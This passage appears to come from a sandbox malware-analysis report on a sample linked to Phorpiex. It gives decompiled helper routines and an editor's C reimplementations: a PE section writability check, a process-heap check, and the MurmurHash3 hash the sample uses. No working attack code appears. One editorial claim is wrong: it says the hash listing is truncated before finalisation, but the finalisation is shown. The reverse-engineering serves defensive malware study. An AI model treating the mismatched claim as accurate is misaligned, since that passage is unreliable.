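 * -1 = target is not inside any section (headers, gaps, or outside the image). */
int pe_is_nonwritable(const uint8_t *base, size_t len, const uint8_t *target)
{
    if (target < base || (size_t)(target - base) >= len) return -1;
    uint32_t ch = 0;
    if (pe_find_section(base, len, (uint32_t)(target - base), &ch) < 0) return -1;
    return (ch & IMAGE_SCN_MEM_WRITE) ? 0 : 1;
}

/* ---- Constructed test image (headers only, not the sample's bytes): two sections ---- */
#define SAMPLE_LEN 0x2400   /* big enough that RVAs in .data stay inside the buffer */
static uint8_t g_sample[SAMPLE_LEN];
static int g_sample_built;
static void put_section(uint8_t *sec, const char *name, uint32_t va, uint32_t vsize, uint32_t ch)
{
    memset(sec, 0, SEC_HEADER_SIZE);
    memcpy(sec, name, strlen(name) < 8 ? strlen(name) : 8);
    wr32(sec + SEC_VIRTUAL_SIZE, vsize);
    wr32(sec + SEC_VIRTUAL_ADDRESS, va);
    wr32(sec + SEC_CHARACTERISTICS, ch);
}
const uint8_t *sample_image(size_t *len)
{
    if (!g_sample_built) {
        const uint32_t e_lfanew = 0x80, opt_size = 0xe0;    /* standard PE32 optional header size */
        uint8_t *nt = g_sample + e_lfanew;
        wr16(g_sample, 0x5a4d);
        wr32(g_sample + DOS_E_LFANEW, e_lfanew);
        wr32(nt, 0x4550);
        wr16(nt + 4, 0x014c);                               /* Machine = IMAGE_FILE_MACHINE_I386 */
        wr16(nt + NT_NUMBER_OF_SECTIONS, 2);
        wr16(nt + NT_SIZE_OF_OPT_HEADER, (uint16_t)opt_size);
        wr16(nt + NT_OPT_MAGIC, 0x10b);
        put_section(nt + NT_OPT_MAGIC + opt_size, ".text", 0x1000, 0x1000, 0x60000020u); /* CODE|EXEC|READ */
        put_section(nt + NT_OPT_MAGIC + opt_size + SEC_HEADER_SIZE, ".data", 0x2000, 0x200, 0xC0000040u); /* R|W */
        g_sample_built = 1;
    }
    if (len) *len = SAMPLE_LEN;
    return g_sample;
}
/* Wrappers over the constructed image: section index / writability for an RVA, and
 * header validation after overwriting 'MZ' (must fail). */
int sample_section_of(uint32_t rva) { size_t n; const uint8_t *b = sample_image(&n); return pe_find_section(b, n, rva, NULL); }
int sample_nonwritable(uint32_t rva) { size_t n; const uint8_t *b = sample_image(&n); return pe_is_nonwritable(b, n, b + rva); }
int sample_corrupt_magic_validates(void)
{
    static uint8_t copy[SAMPLE_LEN];
    size_t n; memcpy(copy, sample_image(&n), n);
    copy[0] = 0;
    return pe_validate_image_base(copy, n);
}
```

With the constructed image, an RVA of 0x1010 resolves to section 0 (.text, not writable), 0x2010 to section 1 (.data, writable), and 0x2200 or any header offset to no section at all; the decompiled code would report the last case the same way it reports a writable section, since both leave it on the L46 path. The `vsize` field used here is Misc.VirtualSize, the same +8 field the sample reads; SizeOfRawData at +0x10 describes the file, not the mapped image, and is the wrong bound for an in-memory address test.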

Instruction-address column from the report's decompiled view for the function above: the mapped addresses run from 0x0040f2d7 to 0x0040f4ea; entries of 0x00000000 mark decompiled lines without a directly mapped instruction.
                                                                                  0x0040f3e4
                                                                                  0x0040f3e6
                                                                                  0x0040f3fa
                                                                                  0x0040f3fc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f3e8
                                                                                  0x0040f3e8
                                                                                  0x0040f3e8
                                                                                  0x0040f3f1
                                                                                  0x0040f3f2
                                                                                  0x0040f3f4
                                                                                  0x0040f3f6
                                                                                  0x0040f3f6
                                                                                  0x00000000
                                                                                  0x0040f3e8
                                                                                  0x0040f3b8
                                                                                  0x0040f3bb
                                                                                  0x0040f3bd
                                                                                  0x0040f3cf
                                                                                  0x0040f3cf
                                                                                  0x0040f3d2
                                                                                  0x0040f3d4
                                                                                  0x0040f3d4
                                                                                  0x0040f3d5
                                                                                  0x0040f3d5
                                                                                  0x0040f3db
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f3bf
                                                                                  0x0040f3bf
                                                                                  0x0040f3bf
                                                                                  0x0040f3c6
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f3c8
                                                                                  0x0040f3c8
                                                                                  0x0040f3c9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f3c9
                                                                                  0x0040f3cb
                                                                                  0x0040f3cd
                                                                                  0x0040f3e0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f3e0
                                                                                  0x00000000
                                                                                  0x0040f3cd
                                                                                  0x0040f33f
                                                                                  0x0040f342
                                                                                  0x0040f345
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f347
                                                                                  0x0040f349
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f349
                                                                                  0x0040f30e
                                                                                  0x0040f310
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 0040F37E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MemoryQueryVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2850889275-0
                                                                                  • Opcode ID: f98938338879da374d1ed71c8d6508647a2f763b1a492ab4de55adfa3652748e
                                                                                  • Instruction ID: 29f1b178ecfcfa274465d653f16a97c573d8a4959422ee4c7472f4b41953faf8
                                                                                  • Opcode Fuzzy Hash: f98938338879da374d1ed71c8d6508647a2f763b1a492ab4de55adfa3652748e
                                                                                  • Instruction Fuzzy Hash: 4E61C530600601CFDB35CE29C99066B73A5EB95324B64843BDC49E7AD1E73CDC4A8698
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                   			#include <windows.h>

                                                                                   			/* Returns 1 if the handle passed in is one of this process's heaps, else 0.
                                                                                   			 * The decompiler rendered the local handle array as an unresolved frame
                                                                                   			 * pointer (_t26 + index*4 - 0x400); it is the 0x3fc-byte buffer handed to
                                                                                   			 * GetProcessHeaps below (_v1028). */
                                                                                   			char E00408C70(HANDLE hHeap) {
                                                                                   				HANDLE heaps[0xff];          /* _v1028: room for 255 heap handles */
                                                                                   				DWORD count;                 /* _v1032 */
                                                                                   				char found = 0;              /* _v1033 */
                                                                                   				DWORD i;                     /* _v1040 */

                                                                                   				count = GetProcessHeaps(0xff, heaps);
                                                                                   				/* A return value above the buffer size means nothing was copied, so
                                                                                   				 * only walk the array when 0 < count <= 0xff. */
                                                                                   				if(count != 0 && count < 0x100) {
                                                                                   					for(i = 0; i < count; i++) {
                                                                                   						if(heaps[i] == hHeap) {
                                                                                   							found = 1;
                                                                                   							break;
                                                                                   						}
                                                                                   					}
                                                                                   				}
                                                                                   				return found;
                                                                                   			}

                                                                                   Instruction addresses for the E00408C70 listing above, in listing order (column detached from its code by extraction; 0x00000000 marks lines that carry no address):
                                                                                   0x00408c79 0x00408c92 0x00408c9f 0x00408cad 0x00408cc8 0x00408ce6 0x00408cc2 0x00000000
                                                                                   0x00408ce8 0x00408ce8 0x00408ce8 0x00000000 0x00408ce6 0x00408cc8 0x00408cf3 0x00408cfc

                                                                                  APIs
                                                                                  • GetProcessHeaps.KERNEL32(000000FF,?), ref: 00408C8C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: HeapsProcess
                                                                                  • String ID:
                                                                                  • API String ID: 1420622215-0
                                                                                  • Opcode ID: 2b4ffe97596f6e5a3cdf22d767e3bfa18bb42636863d7fc4f12c798a20e8a3c3
                                                                                  • Instruction ID: 782807d4e07a0b464ffc2b2183d444dd29adb49f067199873cbcda688cf91ce4
                                                                                  • Opcode Fuzzy Hash: 2b4ffe97596f6e5a3cdf22d767e3bfa18bb42636863d7fc4f12c798a20e8a3c3
                                                                                  • Instruction Fuzzy Hash: 730121F0809158CAEB208F14D9447A9B774EB45304F0081EADB4A37382C6781ECADF5E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004054F0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateInstance
                                                                                  • String ID:
                                                                                  • API String ID: 542301482-0
                                                                                  • Opcode ID: 34e119f03330a37951e29d4ee19d5d58663b392051cfe4a9acefb3e3966ee614
                                                                                  • Instruction ID: 32df2bfe7de06f0c235163c896e6267a06dc4b8e9f39d59c6c8874ca765da36c
                                                                                  • Opcode Fuzzy Hash: 34e119f03330a37951e29d4ee19d5d58663b392051cfe4a9acefb3e3966ee614
                                                                                  • Instruction Fuzzy Hash: 0FE0127490020CFFDF00DF90C889BDEBBB9EB44315F1081A9E90467284D7B55A84CF95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

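                                                                                   The decompiled function E004092E0 that follows is recognisable from its constants alone: the multipliers 0x239b961b, 0xab0e9789, 0x38b34ae5 and 0xa1e38b93, the per-lane rotations 15/19, 16/17, 17/15 and 18/13, and the additive constants 0x561ccd1b, 0x0bcaa747, 0x96cd1c35 (which the decompiler prints as -0x6932e3cb) and 0x32ac3b17 are exactly those of MurmurHash3_x86_128 from Austin Appleby's public-domain MurmurHash3.cpp. The four state words _v20, _v8, _v48 and _v40 are h1..h4, initialised to 0, so the seed is hard-wired to zero; _v36 is the block count len / 16; _v44 is data + nblocks*16, walked from -nblocks upward; and the fall-through switch on (len & 15) - 1 is the tail step, with the listing's case N covering len & 15 == N+1. The listing is cut off inside that switch, so the finalisation is not visible on this page. Below is an added, complete C reimplementation of the reference algorithm with the decompiled locals noted in comments; it is written for this page and is not code from the sample, from Phorpiex or from Joe Sandbox. The interpretation of E00409120 as a little-endian 32-bit block load, the assumption that the result is written to _a12, and every name here (murmur3_x86_128, hash_like_sample, hashes_equal, hash_lane0) and the sample input are this editor's, not the report's; what the sample actually feeds into the hash is not shown here.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Rotate left; the "rol ecx, 0xf" etc. that the decompiler leaves inline. */
static uint32_t rotl32(uint32_t x, int r) {
    return (x << r) | (x >> (32 - r));
}

/* Little-endian 32-bit load from block index i; assumed role of E00409120(_v44, idx). */
static uint32_t getblock32(const uint8_t *p, int i) {
    const uint8_t *b = p + (ptrdiff_t)i * 4;
    return (uint32_t)b[0] | ((uint32_t)b[1] << 8) | ((uint32_t)b[2] << 16) | ((uint32_t)b[3] << 24);
}

/* Reference finalisation mix; this part lies beyond the truncated listing. */
static uint32_t fmix32(uint32_t h) {
    h ^= h >> 16; h *= 0x85ebca6b;
    h ^= h >> 13; h *= 0xc2b2ae35;
    h ^= h >> 16;
    return h;
}

/* MurmurHash3_x86_128 (reference algorithm), 16 bytes of output in four lanes. */
void murmur3_x86_128(const void *key, int len, uint32_t seed, uint32_t out[4]) {
    const uint8_t *data = (const uint8_t *)key;
    const int nblocks = len / 16;                            /* _v36 */
    uint32_t h1 = seed, h2 = seed, h3 = seed, h4 = seed;     /* _v20, _v8, _v48, _v40 */
    const uint32_t c1 = 0x239b961b, c2 = 0xab0e9789, c3 = 0x38b34ae5, c4 = 0xa1e38b93;
    const uint8_t *blocks = data + nblocks * 16;             /* _v44, indexed with negative i */
    int i;

    for (i = -nblocks; i; i++) {                             /* _v76 counts up to 0 */
        uint32_t k1 = getblock32(blocks, i * 4 + 0);
        uint32_t k2 = getblock32(blocks, i * 4 + 1);
        uint32_t k3 = getblock32(blocks, i * 4 + 2);
        uint32_t k4 = getblock32(blocks, i * 4 + 3);

        k1 *= c1; k1 = rotl32(k1, 15); k1 *= c2; h1 ^= k1;
        h1 = rotl32(h1, 19); h1 += h2; h1 = h1 * 5 + 0x561ccd1b;
        k2 *= c2; k2 = rotl32(k2, 16); k2 *= c3; h2 ^= k2;
        h2 = rotl32(h2, 17); h2 += h3; h2 = h2 * 5 + 0x0bcaa747;
        k3 *= c3; k3 = rotl32(k3, 17); k3 *= c4; h3 ^= k3;
        h3 = rotl32(h3, 15); h3 += h4; h3 = h3 * 5 + 0x96cd1c35;   /* listing: h3*5 - 0x6932e3cb */
        k4 *= c4; k4 = rotl32(k4, 18); k4 *= c1; h4 ^= k4;
        h4 = rotl32(h4, 13); h4 += h1; h4 = h4 * 5 + 0x32ac3b17;
    }

    /* Tail: the fall-through switch; the listing's case N is (len & 15) == N+1. */
    {
        const uint8_t *tail = data + nblocks * 16;           /* _v28 */
        uint32_t k1 = 0, k2 = 0, k3 = 0, k4 = 0;
        switch (len & 15) {
        case 15: k4 ^= (uint32_t)tail[14] << 16; /* fall through */
        case 14: k4 ^= (uint32_t)tail[13] << 8;  /* fall through */
        case 13: k4 ^= (uint32_t)tail[12];
                 k4 *= c4; k4 = rotl32(k4, 18); k4 *= c1; h4 ^= k4; /* fall through */
        case 12: k3 ^= (uint32_t)tail[11] << 24; /* fall through */
        case 11: k3 ^= (uint32_t)tail[10] << 16; /* fall through */
        case 10: k3 ^= (uint32_t)tail[9] << 8;   /* fall through */
        case 9:  k3 ^= (uint32_t)tail[8];
                 k3 *= c3; k3 = rotl32(k3, 17); k3 *= c4; h3 ^= k3; /* fall through */
        case 8:  k2 ^= (uint32_t)tail[7] << 24;  /* fall through */
        case 7:  k2 ^= (uint32_t)tail[6] << 16;  /* fall through */
        case 6:  k2 ^= (uint32_t)tail[5] << 8;   /* fall through */
        case 5:  k2 ^= (uint32_t)tail[4];
                 k2 *= c2; k2 = rotl32(k2, 16); k2 *= c3; h2 ^= k2; /* fall through */
        case 4:  k1 ^= (uint32_t)tail[3] << 24;  /* fall through */
        case 3:  k1 ^= (uint32_t)tail[2] << 16;  /* fall through */
        case 2:  k1 ^= (uint32_t)tail[1] << 8;   /* fall through */
        case 1:  k1 ^= (uint32_t)tail[0];
                 k1 *= c1; k1 = rotl32(k1, 15); k1 *= c2; h1 ^= k1;
        }
    }

    /* Finalisation: fold the length in, cross-mix the lanes, fmix, cross-mix again. */
    h1 ^= (uint32_t)len; h2 ^= (uint32_t)len; h3 ^= (uint32_t)len; h4 ^= (uint32_t)len;
    h1 += h2; h1 += h3; h1 += h4; h2 += h1; h3 += h1; h4 += h1;
    h1 = fmix32(h1); h2 = fmix32(h2); h3 = fmix32(h3); h4 = fmix32(h4);
    h1 += h2; h1 += h3; h1 += h4; h2 += h1; h3 += h1; h4 += h1;
    out[0] = h1; out[1] = h2; out[2] = h3; out[3] = h4;
}

/* Mirrors the decompiled calling shape E004092E0(key, len, out): seed fixed at 0. */
void hash_like_sample(const void *key, int len, uint32_t out[4]) {
    murmur3_x86_128(key, len, 0, out);
}

/* First output lane, for quick comparisons against values recovered from a run. */
uint32_t hash_lane0(const void *key, int len) {
    uint32_t h[4];
    hash_like_sample(key, len, h);
    return h[0];
}

/* 1 when both inputs produce the same 128-bit digest, else 0. */
int hashes_equal(const void *a, int alen, const void *b, int blen) {
    uint32_t ha[4], hb[4];
    hash_like_sample(a, alen, ha);
    hash_like_sample(b, blen, hb);
    return memcmp(ha, hb, sizeof ha) == 0;
}

int main(void) {
    const char msg[] = "constructed sample input, not from the report";  /* constructed */
    uint32_t h[4];
    hash_like_sample(msg, (int)strlen(msg), h);
    printf("%08x%08x%08x%08x\n", h[0], h[1], h[2], h[3]);
    return 0;
}
```

                                                                                   Keeping the seed at zero reproduces what the sample computes for a given buffer, which is what you need to recreate its hash values offline once the hashed input is known; the lane-by-lane annotations let you line each statement up against the decompiled locals when checking that identification.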
                                                                                  C-Code - Quality: 89%
                                                                                  			E004092E0(signed int __edx, intOrPtr _a4, signed int _a8, signed int* _a12) {
                                                                                  				signed int _v8;
                                                                                  				signed int _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				signed int _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				signed char* _v28;
                                                                                  				intOrPtr _v32;
                                                                                  				signed int _v36;
                                                                                  				signed int _v40;
                                                                                  				intOrPtr _v44;
                                                                                  				signed int _v48;
                                                                                  				signed int _v52;
                                                                                  				signed int _v56;
                                                                                  				intOrPtr _v60;
                                                                                  				intOrPtr _v64;
                                                                                  				signed int _v68;
                                                                                  				signed int _v72;
                                                                                  				signed int _v76;
                                                                                  				signed int _v80;
                                                                                  				signed int _v84;
                                                                                  				signed int _v88;
                                                                                  				signed int _v92;
                                                                                  				signed int _v96;
                                                                                  				signed int _t306;
                                                                                  				signed int _t336;
                                                                                  				void* _t502;
                                                                                  
                                                                                   				_v72 = 0;
                                                                                   				_v60 = _a4;                               /* pointer to the data being hashed */
                                                                                   				asm("cdq");
                                                                                   				_v36 = _a8 + (__edx & 0x0000000f) >> 4;   /* nblocks = len / 16, signed division via cdq/sar */
                                                                                   				_v20 = 0;                                 /* h1 */
                                                                                   				_v8 = 0;                                  /* h2 */
                                                                                   				_v48 = 0;                                 /* h3 */
                                                                                   				_v40 = 0;                                 /* h4: all four lanes start from a fixed seed of 0 */
                                                                                   				_v24 = 0x239b961b;                        /* c1 */
                                                                                   				_v32 = 0xab0e9789;                        /* c2 */
                                                                                   				_v16 = 0x38b34ae5;                        /* c3 */
                                                                                   				_v64 = 0xa1e38b93;                        /* c4: the MurmurHash3 x86_128 multipliers */
                                                                                   				_v44 = (_v36 << 4) + _v60;                /* blocks = data + nblocks*16, indexed backwards in the loop */
                                                                                  				_v76 =  ~_v36;
                                                                                  				while(_v76 != 0) {
                                                                                  					_v92 = E00409120(_v44, _v76 << 2);
                                                                                  					_v88 = E00409120(_v44, 1 + _v76 * 4);
                                                                                  					_v84 = E00409120(_v44, 2 + _v76 * 4);
                                                                                  					_t336 = E00409120(_v44, 3 + _v76 * 4);
                                                                                  					_t502 = _t502 + 0x20;
                                                                                  					_v80 = _t336;
                                                                                  					_v92 = _v92 * 0x239b961b;
                                                                                  					asm("rol ecx, 0xf");
                                                                                  					_v92 = _v92 * 0xab0e9789;
                                                                                  					_v20 = _v20 ^ _v92;
                                                                                  					asm("rol ecx, 0x13");
                                                                                  					_v20 = _v20 + _v8;
                                                                                  					_v20 = 0x561ccd1b + _v20 * 5;
                                                                                  					_v88 = _v88 * 0xab0e9789;
                                                                                  					asm("rol edx, 0x10");
                                                                                  					_v88 = _v88 * 0x38b34ae5;
                                                                                  					_v8 = _v8 ^ _v88;
                                                                                  					asm("rol edx, 0x11");
                                                                                  					_v8 = _v8 + _v48;
                                                                                  					_v8 = 0xbcaa747 + _v8 * 5;
                                                                                  					_v84 = _v84 * 0x38b34ae5;
                                                                                  					asm("rol eax, 0x11");
                                                                                  					_v84 = _v84 * 0xa1e38b93;
                                                                                  					_v48 = _v48 ^ _v84;
                                                                                  					asm("rol eax, 0xf");
                                                                                  					_v48 = _v48 + _v40;
                                                                                  					_v48 = _v48 * 5 - 0x6932e3cb;
                                                                                  					_v80 = _v80 * 0xa1e38b93;
                                                                                  					asm("rol ecx, 0x12");
                                                                                  					_v80 = _v80 * 0x239b961b;
                                                                                  					_v40 = _v40 ^ _v80;
                                                                                  					asm("rol ecx, 0xd");
                                                                                  					_v40 = _v40 + _v20;
                                                                                  					_v40 = 0x32ac3b17 + _v40 * 5;
                                                                                  					_v76 = _v76 + 1;
                                                                                  				}
                                                                                  				_v28 = (_v36 << 4) + _v60;
                                                                                  				_v68 = 0;
                                                                                  				_v56 = 0;
                                                                                  				_v52 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v96 = _a8 & 0x0000000f;
                                                                                  				_v96 = _v96 - 1;
                                                                                  				if(_v96 <= 0xe) {
                                                                                  					switch( *((intOrPtr*)(_v96 * 4 +  &M004097C4))) {
                                                                                  						case 0:
                                                                                  							L20:
                                                                                  							_v68 =  *_v28 & 0x000000ff ^ _v68;
                                                                                  							_v68 = _v68 * 0x239b961b;
                                                                                  							asm("rol eax, 0xf");
                                                                                  							_v68 = _v68 * 0xab0e9789;
                                                                                  							_v20 = _v20 ^ _v68;
                                                                                  							goto L21;
                                                                                  						case 1:
                                                                                  							L19:
                                                                                  							_v68 = (_v28[1] & 0x000000ff) << 0x00000008 ^ _v68;
                                                                                  							goto L20;
                                                                                  						case 2:
                                                                                  							L18:
                                                                                  							_v68 = (_v28[2] & 0x000000ff) << 0x00000010 ^ _v68;
                                                                                  							goto L19;
                                                                                  						case 3:
                                                                                  							L17:
                                                                                  							_v68 = (_v28[3] & 0x000000ff) << 0x00000018 ^ _v68;
                                                                                  							goto L18;
                                                                                  						case 4:
                                                                                  							L16:
                                                                                  							_v56 = _v28[4] & 0x000000ff ^ _v56;
                                                                                  							_v56 = _v56 * 0xab0e9789;
                                                                                  							asm("rol eax, 0x10");
                                                                                  							_v56 = _v56 * 0x38b34ae5;
                                                                                  							_v8 = _v8 ^ _v56;
                                                                                  							goto L17;
                                                                                  						case 5:
                                                                                  							L15:
                                                                                  							_v56 = (_v28[5] & 0x000000ff) << 0x00000008 ^ _v56;
                                                                                  							goto L16;
                                                                                  						case 6:
                                                                                  							L14:
                                                                                  							_v56 = (_v28[6] & 0x000000ff) << 0x00000010 ^ _v56;
                                                                                  							goto L15;
                                                                                  						case 7:
                                                                                  							L13:
                                                                                  							_v56 = (_v28[7] & 0x000000ff) << 0x00000018 ^ _v56;
                                                                                  							goto L14;
                                                                                  						case 8:
                                                                                  							L12:
                                                                                  							_v52 = _v28[8] & 0x000000ff ^ _v52;
                                                                                  							_v52 = _v52 * 0x38b34ae5;
                                                                                  							asm("rol eax, 0x11");
                                                                                  							_v52 = _v52 * 0xa1e38b93;
                                                                                  							_v48 = _v48 ^ _v52;
                                                                                  							goto L13;
                                                                                  						case 9:
                                                                                  							L11:
                                                                                  							_v52 = (_v28[9] & 0x000000ff) << 0x00000008 ^ _v52;
                                                                                  							goto L12;
                                                                                  						case 0xa:
                                                                                  							L10:
                                                                                  							_v52 = (_v28[0xa] & 0x000000ff) << 0x00000010 ^ _v52;
                                                                                  							goto L11;
                                                                                  						case 0xb:
                                                                                  							L9:
                                                                                  							_v52 = (_v28[0xb] & 0x000000ff) << 0x00000018 ^ _v52;
                                                                                  							goto L10;
                                                                                  						case 0xc:
                                                                                  							L8:
                                                                                  							_v12 = _v28[0xc] & 0x000000ff ^ _v12;
                                                                                  							_v12 = _v12 * 0xa1e38b93;
                                                                                  							asm("rol eax, 0x12");
                                                                                  							_v12 = _v12 * 0x239b961b;
                                                                                  							_v40 = _v40 ^ _v12;
                                                                                  							goto L9;
                                                                                  						case 0xd:
                                                                                  							L7:
                                                                                  							_v12 = (_v28[0xd] & 0x000000ff) << 0x00000008 ^ _v12;
                                                                                  							goto L8;
                                                                                  						case 0xe:
                                                                                  							_v12 = (_v28[0xe] & 0x000000ff) << 0x00000010 ^ _v12;
                                                                                  							goto L7;
                                                                                  					}
                                                                                  				}
                                                                                  				L21:
                                                                                  				_v20 = _v20 ^ _a8;
                                                                                  				_v8 = _v8 ^ _a8;
                                                                                  				_v48 = _v48 ^ _a8;
                                                                                  				_v40 = _v40 ^ _a8;
                                                                                  				_v20 = _v20 + _v8;
                                                                                  				_v20 = _v20 + _v48;
                                                                                  				_v20 = _v20 + _v40;
                                                                                  				_v8 = _v8 + _v20;
                                                                                  				_v48 = _v48 + _v20;
                                                                                  				_v40 = _v40 + _v20;
                                                                                  				_v20 = E00409130(_v20);
                                                                                  				_v8 = E00409130(_v8);
                                                                                  				_v48 = E00409130(_v48);
                                                                                  				_v40 = E00409130(_v40);
                                                                                  				_v20 = _v20 + _v8;
                                                                                  				_v20 = _v20 + _v48;
                                                                                  				_v20 = _v20 + _v40;
                                                                                  				_v8 = _v8 + _v20;
                                                                                  				_v48 = _v48 + _v20;
                                                                                  				_v40 = _v40 + _v20;
                                                                                  				 *_a12 = _v20;
                                                                                  				_a12[1] = _v8;
                                                                                  				_a12[2] = _v48;
                                                                                  				_t306 = _v40;
                                                                                  				_a12[3] = _t306;
                                                                                  				return _t306;
                                                                                  			}

                                                                                  0x004092e6
                                                                                  0x004092f0
                                                                                  0x004092f6
                                                                                  0x004092ff
                                                                                  0x00409302
                                                                                  0x00409309
                                                                                  0x00409310
                                                                                  0x00409317
                                                                                  0x0040931e
                                                                                  0x00409325
                                                                                  0x0040932c
                                                                                  0x00409333
                                                                                  0x00409343
                                                                                  0x0040934b
                                                                                  0x00409359
                                                                                  0x00409376
                                                                                  0x00409390
                                                                                  0x004093aa
                                                                                  0x004093bc
                                                                                  0x004093c1
                                                                                  0x004093c4
                                                                                  0x004093d0
                                                                                  0x004093d6
                                                                                  0x004093e5
                                                                                  0x004093ee
                                                                                  0x004093f4
                                                                                  0x00409400
                                                                                  0x0040940e
                                                                                  0x0040941a
                                                                                  0x00409420
                                                                                  0x0040942f
                                                                                  0x00409438
                                                                                  0x0040943e
                                                                                  0x0040944a
                                                                                  0x00409459
                                                                                  0x00409465
                                                                                  0x0040946b
                                                                                  0x0040947a
                                                                                  0x00409483
                                                                                  0x00409489
                                                                                  0x00409495
                                                                                  0x004094a4
                                                                                  0x004094b0
                                                                                  0x004094b6
                                                                                  0x004094c5
                                                                                  0x004094ce
                                                                                  0x004094d4
                                                                                  0x004094e0
                                                                                  0x004094ee
                                                                                  0x00409356
                                                                                  0x00409356
                                                                                  0x004094ff
                                                                                  0x00409502
                                                                                  0x00409509
                                                                                  0x00409510
                                                                                  0x00409517
                                                                                  0x00409524
                                                                                  0x0040952d
                                                                                  0x00409534
                                                                                  0x0040953d
                                                                                  0x00000000
                                                                                  0x00409699
                                                                                  0x004096a2
                                                                                  0x004096ae
                                                                                  0x004096b4
                                                                                  0x004096c3
                                                                                  0x004096cc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409689
                                                                                  0x00409696
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409679
                                                                                  0x00409686
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409669
                                                                                  0x00409676
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409632
                                                                                  0x0040963c
                                                                                  0x00409648
                                                                                  0x0040964e
                                                                                  0x0040965d
                                                                                  0x00409666
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409622
                                                                                  0x0040962f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409612
                                                                                  0x0040961f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409602
                                                                                  0x0040960f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004095cb
                                                                                  0x004095d5
                                                                                  0x004095e1
                                                                                  0x004095e7
                                                                                  0x004095f6
                                                                                  0x004095ff
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004095bb
                                                                                  0x004095c8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004095ab
                                                                                  0x004095b8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040959b
                                                                                  0x004095a8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409564
                                                                                  0x0040956e
                                                                                  0x0040957a
                                                                                  0x00409580
                                                                                  0x0040958f
                                                                                  0x00409598
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409554
                                                                                  0x00409561
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409551
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040953d
                                                                                  0x004096cf
                                                                                  0x004096d5
                                                                                  0x004096de
                                                                                  0x004096e7
                                                                                  0x004096f0
                                                                                  0x004096f9
                                                                                  0x00409702
                                                                                  0x0040970b
                                                                                  0x00409714
                                                                                  0x0040971d
                                                                                  0x00409726
                                                                                  0x00409735
                                                                                  0x00409744
                                                                                  0x00409753
